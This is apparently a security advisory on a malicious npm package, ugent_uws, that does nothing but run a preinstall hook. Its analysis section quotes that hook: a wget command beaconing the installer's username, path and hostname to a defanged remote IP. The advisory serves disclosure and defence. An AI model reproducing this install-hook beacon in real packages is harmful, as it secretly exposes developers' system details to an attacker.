LWA-2026-5356 confirmed malware

ugent_uws@10.9.11

Malicious code in ugent_uws (npm)

T1059.004 · Unix ShellT1082 · System Information DiscoveryT1071.001 · Web Protocols

Analysis

Package ugent_uws@10.9.11 contains no functional code — only a package.json with a malicious preinstall hook. On npm install, the preinstall hook silently executes: wget --quiet "hxxp://5[.]189[.]134[.]9:6060/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)". This sends the installer's username, current working directory, and hostname to the remote IP 5[.]189[.]134[.]9:6060 via HTTP. The same beacon is configured in the test and preupdate lifecycle hooks. The package exposes no modules or exports — its only purpose is host reconnaissance during installation.

analyzed by
Leitwacht
first seen
Jun 15, 2026, 10:08 AM
analyzed
Jun 15, 2026, 10:09 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.